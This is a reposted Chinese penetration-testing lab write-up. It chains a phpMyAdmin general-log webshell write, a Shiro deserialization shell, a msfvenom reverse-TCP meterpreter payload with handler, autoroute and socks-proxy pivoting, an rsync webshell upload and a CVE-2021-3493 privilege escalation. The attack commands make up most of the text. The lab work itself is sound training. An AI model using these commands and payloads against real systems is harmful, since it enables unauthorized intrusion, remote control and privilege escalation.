IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 【渗透测试】phpmyadmin一句话写入+socks代理渗透内网+CVE-2021-3493漏洞利用 -> 正文阅读

[PHP知识库]【渗透测试】phpmyadmin一句话写入+socks代理渗透内网+CVE-2021-3493漏洞利用

环境搭建:

1.攻击机kali:NAT连接

2.ubuntu靶机:自定义的仅主机模式,设置为和windows内网相同网段

同时需要启动rsync服务:

sudo /etc/init.d/rsync start

.windows x64靶机:NAT连接和自定义的仅主机模式(开启8080端口和phpstudy服务)配置步骤:

1)在"编辑"中选择"虚拟网络编辑器",更改设置为添加一个VMnet,此时虚拟机会自动分配一个内网ip

?渗透目标:

1.首先渗透进入windows主机,获取第一个flag

2.通过windows主机反弹shell到msf上,设置代理访问内网主机

3.渗透进入内网之后,进行提权

?一、外网渗透:

方法一:

1.目录扫描出phpmyadmin地址,进行弱口令root root登录,在sql中写入一句话木马:

SHOW VARIABLES LIKE 'general%'
set global general_log = "ON";
set global general_log_file='C:/phpStudy/PHPTutorial/WWW/yan.php';
select '<?php  eval($_POST[admin]);?>';

OFF?表示日志关闭
C:/phpStudy/PHPTutorial/WWW/yan.php?为日志绝对路径

2.写入后使用菜刀进行连接,在users目录下的桌面里发现第一个flag:

方法二:

1.因为发现是shiro框架,目录扫描出uploads上传地址,所以使用shiro反序列化漏洞工具,检查密钥和利用链,输入扫描到的目录上传jsp执行注入:(内存马类型应该选冰蝎,这里点击错误)

2.注入成功后,访问当前路径,使用冰蝎进行连接:

?3.打开虚拟终端,发现存在159网段,所以进行该网段的端口扫描:

?

?4.首先使用msf生成一个windows木马,通过菜刀上传上去:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.225.133 lport=1234 -f exe > conf.exe

5.在kali上启动msf进行监听,在虚拟终端执行该木马,反弹回shell到kali终端:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1234
run
conf.exe //菜刀连接的靶机上执行后门程序

?

6.因为存在内网159网段的地址,所以为其添加一条路由,并放在后台:

run autoroute -s 192.168.159.0/24
run autoroute -p //打印路由信息,确认是否成功添加路由
background

7. 在本机启动socks代理进行内网访问:

search socks
use auxiliary/server/socks_proxy
show options //默认设置已经配好,所以不需要进行修改
run

?成功建立连接:

8.现在在kali上添加代理:

export all_proxy=http://127.0.0.1:1080

?9.?进行内网网段ip和端口的扫描,扫描到内网IP为:192.168.225.130,端口发现开放了873的rsync端口:

知识点:

rsync 是远程同步命令:remote sync,但它可以远程同步数据(类似于 scp 命令),也可以本地同步数据(类似于 cp 命令)。

不同于 cp 或 scp 的一点是,使用 rsync 命令备份数据时,不会直接覆盖以前的数据(如果数据已经存在),而是先判断已经存在的数据和新数据的差异,只有数据不同时才会把不相同的部分覆盖。

10.尝试进行rsync连接,可以看到ftp下是服务器根?录

rsync rsync://192.168.159.130 //查看开启了什么服务
rsync rsync://192.168.159.130/ftp

11.由于开放了80端口,所以上传一个webshell到靶机:

rsync c.php rsync://192.168.159.130/ftp/var/www/html/   //备份本地文件到远程电脑的/var/www/html中

12.上传成功后,使用冰蝎(为了得到交互式shell)设置代理,进行连接,在网站根目录获取第二个flag:

提权:

1.进行版本搜索,可以看到是2020年的ubuntu,可以使?CVE-2021-3493 ubuntu权限提升漏洞进?提权,现在kali机上进行下载编译:

git clone git://github.com/briskets/CVE-2021-3493 //漏洞利用脚本下载
gcc exploit.c -o exploit //编译
chmod +x exploit //修改执行权限

2.将编译好的expliot通过冰蝎上传到靶机,在交互式终端执行,成功提权获取第三个flag:

./exploit

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-09-03 11:40:27  更:2021-09-03 11:41:28 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 10:46:19-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码